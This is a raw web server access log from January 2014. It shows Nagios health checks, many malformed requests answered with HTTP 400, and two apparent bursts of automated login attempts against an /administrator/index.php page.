193.17.208.66 - - [17/Jan/2014:22:20:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:20:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:20:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:20:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:20:18 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:20:53 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:20:53 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:20:53 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:20:53 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:20:53 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:21:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:21:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:21:28 +0200] "-" 400 0 "-" "-"
193.107.108.69 - - [17/Jan/2014:22:21:31 +0200] "-" 400 0 "-" "-"
213.231.40.40 - - [17/Jan/2014:22:21:42 +0200] "-" 400 0 "-" "-"
213.231.40.40 - - [17/Jan/2014:22:21:42 +0200] "-" 400 0 "-" "-"
213.231.40.40 - - [17/Jan/2014:22:21:42 +0200] "-" 400 0 "-" "-"
213.231.40.40 - - [17/Jan/2014:22:21:42 +0200] "-" 400 0 "-" "-"
213.231.40.40 - - [17/Jan/2014:22:21:42 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:22:04 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [17/Jan/2014:22:22:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:22:18 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:22:22:18 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:23:20 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:25:28 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
91.218.192.254 - - [17/Jan/2014:22:26:13 +0200] "-" 400 0 "-" "-"
91.218.192.254 - - [17/Jan/2014:22:26:22 +0200] "-" 400 0 "-" "-"
91.218.192.254 - - [17/Jan/2014:22:26:22 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:27:28 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
95.134.56.75 - - [17/Jan/2014:22:27:42 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:29:40 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
93.73.153.190 - - [17/Jan/2014:22:29:42 +0200] "-" 400 0 "-" "-"
93.73.153.190 - - [17/Jan/2014:22:29:42 +0200] "-" 400 0 "-" "-"
83.149.9.69 - - [17/Jan/2014:22:30:41 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:31:35 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:31:35 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:31:35 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:31:35 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:31:41 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
37.115.58.186 - - [17/Jan/2014:22:32:24 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:32:24 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:32:34 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:32:34 +0200] "-" 400 0 "-" "-"
46.119.247.211 - - [17/Jan/2014:22:33:17 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:34:28 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:35:44 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:35:44 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:35:44 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:35:44 +0200] "-" 400 0 "-" "-"
37.115.58.186 - - [17/Jan/2014:22:35:44 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
91.250.26.68 - - [17/Jan/2014:22:36:13 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:36:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
147.30.233.219 - - [17/Jan/2014:22:36:42 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:37:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:37:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:37:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:37:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:37:03 +0200] "-" 400 0 "-" "-"
83.149.9.69 - - [17/Jan/2014:22:37:33 +0200] "-" 400 0 "-" "-"
109.207.207.153 - - [17/Jan/2014:22:38:25 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:38:33 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
213.133.177.53 - - [17/Jan/2014:22:38:51 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:39:39 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
94.158.32.147 - - [17/Jan/2014:22:39:59 +0200] "-" 400 0 "-" "-"
95.28.172.108 - - [17/Jan/2014:22:40:21 +0200] "-" 400 0 "-" "-"
83.149.44.135 - - [17/Jan/2014:22:40:42 +0200] "-" 400 0 "-" "-"
94.158.32.147 - - [17/Jan/2014:22:40:49 +0200] "-" 400 0 "-" "-"
94.158.32.147 - - [17/Jan/2014:22:41:39 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:41:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
94.158.32.147 - - [17/Jan/2014:22:41:59 +0200] "-" 400 0 "-" "-"
94.158.32.147 - - [17/Jan/2014:22:42:19 +0200] "-" 400 0 "-" "-"
147.30.233.219 - - [17/Jan/2014:22:43:08 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:43:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
31.172.194.141 - - [17/Jan/2014:22:44:53 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:45:09 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:47:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:47:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:47:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:47:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:47:03 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:47:21 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
147.30.233.219 - - [17/Jan/2014:22:49:30 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:49:32 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
83.149.35.60 - - [17/Jan/2014:22:49:48 +0200] "-" 400 0 "-" "-"
46.191.188.171 - - [17/Jan/2014:22:50:21 +0200] "-" 400 0 "-" "-"
147.30.233.219 - - [17/Jan/2014:22:50:38 +0200] "-" 400 0 "-" "-"
194.44.203.222 - - [17/Jan/2014:22:51:02 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:51:37 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.44.203.222 - - [17/Jan/2014:22:52:32 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:53:46 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
46.119.240.7 - - [17/Jan/2014:22:55:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:55:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:55:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:55:03 +0200] "-" 400 0 "-" "-"
46.119.240.7 - - [17/Jan/2014:22:55:03 +0200] "-" 400 0 "-" "-"
46.191.188.171 - - [17/Jan/2014:22:56:34 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:56:38 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:22:57:40 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:22:59:46 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
94.140.160.238 - - [17/Jan/2014:22:59:58 +0200] "GET /administrator/index.php HTTP/1.1" 200 4574 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:22:59:58 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:22:59:59 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:22:59:59 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:23:00:06 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:23:00:07 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:23:00:07 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:23:00:08 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
94.140.160.238 - - [17/Jan/2014:23:00:08 +0200] "GET /administrator/index.php HTTP/1.1" 200 7057 "-" "Mozilla/3.0 (compatible; Indy Library)"
194.28.84.86 - - [17/Jan/2014:23:01:06 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:02:09 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
95.52.52.52 - - [17/Jan/2014:23:02:38 +0200] "-" 400 0 "-" "-"
95.52.52.52 - - [17/Jan/2014:23:02:38 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:03:35 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:05:35 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
93.78.141.204 - - [17/Jan/2014:23:07:30 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:30 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:30 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:30 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:07:40 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
93.78.141.204 - - [17/Jan/2014:23:07:47 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:47 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:47 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:47 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:57 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:57 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:07:57 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:08:52 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:08:52 +0200] "-" 400 0 "-" "-"
46.211.140.151 - - [17/Jan/2014:23:08:53 +0200] "-" 400 0 "-" "-"
46.211.140.151 - - [17/Jan/2014:23:08:53 +0200] "-" 400 0 "-" "-"
46.211.140.151 - - [17/Jan/2014:23:08:53 +0200] "-" 400 0 "-" "-"
46.211.140.151 - - [17/Jan/2014:23:08:53 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:16 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:16 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:16 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:16 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:33 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:33 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:33 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:33 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:40 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:40 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:40 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:09:40 +0200] "-" 400 0 "-" "-"
46.211.140.151 - - [17/Jan/2014:23:09:43 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:09:44 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
93.78.141.204 - - [17/Jan/2014:23:10:18 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:10:18 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:10:18 +0200] "-" 400 0 "-" "-"
93.78.141.204 - - [17/Jan/2014:23:10:18 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:12:36 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:14:52 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:16:52 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:18:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:20:54 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:23:00 +0200] "-" 400 0 "-" "-"
146.0.84.232 - - [17/Jan/2014:23:23:20 +0200] "-" 400 0 "-" "-"
146.0.84.232 - - [17/Jan/2014:23:23:20 +0200] "-" 400 0 "-" "-"
146.0.84.232 - - [17/Jan/2014:23:23:20 +0200] "-" 400 0 "-" "-"
146.0.84.232 - - [17/Jan/2014:23:23:20 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:24:03 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:26:08 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
202.46.49.72 - - [17/Jan/2014:23:26:49 +0200] "GET / HTTP/1.1" 200 111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
37.19.158.157 - - [17/Jan/2014:23:27:53 +0200] "-" 400 0 "-" "-"
79.225.76.95 - - [17/Jan/2014:23:27:53 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:28:23 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
37.19.158.157 - - [17/Jan/2014:23:28:44 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:28:44 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:28:44 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:28:44 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:28:44 +0200] "-" 400 0 "-" "-"
119.63.193.132 - - [17/Jan/2014:23:28:52 +0200] "GET / HTTP/1.1" 200 111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
109.87.58.128 - - [17/Jan/2014:23:29:00 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:30 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:37 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:37 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:37 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:37 +0200] "-" 400 0 "-" "-"
37.19.158.157 - - [17/Jan/2014:23:29:37 +0200] "-" 400 0 "-" "-"
46.175.22.19 - - [17/Jan/2014:23:31:47 +0200] "-" 400 0 "-" "-"
46.175.22.19 - - [17/Jan/2014:23:31:47 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:31:47 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:34:09 +0200] "-" 400 0 "-" "-"
5.105.104.111 - - [17/Jan/2014:23:35:28 +0200] "-" 400 0 "-" "-"
46.191.188.171 - - [17/Jan/2014:23:36:02 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:36:16 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:38:15 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
109.87.58.128 - - [17/Jan/2014:23:38:32 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:40:24 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
85.238.127.214 - - [17/Jan/2014:23:40:52 +0200] "-" 400 0 "-" "-"
177.159.182.90 - - [17/Jan/2014:23:41:12 +0200] "HEAD / HTTP/1.1" 200 0 "-" "-"
80.82.64.235 - - [17/Jan/2014:23:41:29 +0200] "GET / HTTP/1.1" 200 111 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:41:30 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
178.213.107.240 - - [17/Jan/2014:23:42:34 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:42:36 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
2.82.158.18 - - [17/Jan/2014:23:43:02 +0200] "GET /administrator/index.php HTTP/1.1" 200 4574 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:03 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:04 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:04 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:04 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:09 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:09 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:10 +0200] "POST /administrator/index.php HTTP/1.0" 303 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
2.82.158.18 - - [17/Jan/2014:23:43:11 +0200] "GET /administrator/index.php HTTP/1.1" 200 7057 "-" "Mozilla/3.0 (compatible; Indy Library)"
194.28.84.86 - - [17/Jan/2014:23:43:40 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
109.227.90.163 - - [17/Jan/2014:23:44:15 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:45:17 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:46:22 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:48:23 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:50:23 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
130.180.211.124 - - [17/Jan/2014:23:50:41 +0200] "-" 400 0 "-" "-"
130.180.211.124 - - [17/Jan/2014:23:50:41 +0200] "-" 400 0 "-" "-"
130.180.211.124 - - [17/Jan/2014:23:50:41 +0200] "-" 400 0 "-" "-"
87.76.255.58 - - [17/Jan/2014:23:51:23 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:52:23 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:53:10 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
194.28.84.86 - - [17/Jan/2014:23:54:37 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [17/Jan/2014:23:55:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:23:55:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:23:55:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:23:55:21 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [17/Jan/2014:23:55:21 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:56:00 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:57:04 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
93.73.153.190 - - [17/Jan/2014:23:57:18 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [17/Jan/2014:23:59:09 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [18/Jan/2014:00:00:01 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:00:01 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:00:01 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:01:01 +0200] "-" 400 0 "-" "-"
91.77.37.154 - - [18/Jan/2014:00:04:13 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:05:41 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
109.87.58.128 - - [18/Jan/2014:00:06:00 +0200] "-" 400 0 "-" "-"
188.169.107.232 - - [18/Jan/2014:00:06:19 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:07:44 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
188.169.107.232 - - [18/Jan/2014:00:09:29 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:09:51 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
188.169.107.232 - - [18/Jan/2014:00:10:59 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:12:28 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:12:49 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:13:29 +0200] "-" 400 0 "-" "-"
37.229.58.188 - - [18/Jan/2014:00:13:43 +0200] "-" 400 0 "-" "-"
37.229.58.188 - - [18/Jan/2014:00:13:45 +0200] "-" 400 0 "-" "-"
213.138.84.12 - - [18/Jan/2014:00:14:22 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:14:55 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:14:57 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
188.169.107.232 - - [18/Jan/2014:00:15:04 +0200] "-" 400 0 "-" "-"
188.169.107.232 - - [18/Jan/2014:00:15:41 +0200] "-" 400 0 "-" "-"
188.169.107.232 - - [18/Jan/2014:00:16:11 +0200] "-" 400 0 "-" "-"
46.191.188.171 - - [18/Jan/2014:00:16:14 +0200] "-" 400 0 "-" "-"
188.169.107.232 - - [18/Jan/2014:00:16:39 +0200] "-" 400 0 "-" "-"
188.169.107.232 - - [18/Jan/2014:00:17:15 +0200] "-" 400 0 "-" "-"
92.113.116.115 - - [18/Jan/2014:00:17:17 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:19:18 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
66.249.66.28 - - [18/Jan/2014:00:19:47 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:20:54 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:20:54 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:20:54 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:20:54 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:20:54 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:21:18 +0200] "GET / HTTP/1.0" 200 12063 "-" "check_http/v1.4.15 (nagios-plugins 1.4.15)"
193.17.208.66 - - [18/Jan/2014:00:22:14 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:22:14 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:22:14 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:22:14 +0200] "-" 400 0 "-" "-"
193.17.208.66 - - [18/Jan/2014:00:22:14 +0200] "-" 400 0 "-" "-"
78.111.187.26 - - [18/Jan/2014:00:23:17 +0200] "-" 400 0 "-" "-"
194.28.84.86 - - [18/Jan/2014:00:23:20 +0200] "-" 400 0 "-" "-"
190.8.150.66 - - [18/Jan/2014:00:23:51 +0200] "-" 400 0 "-" "-"
190.8.150.66 - - [18/Jan/2014:00:24:06 +0200] "-" 400 0 "-" "-"
190.8.150.66 - - [18/Jan/2014:00:24:26 +0200] "-" 400 0 "-" "-"
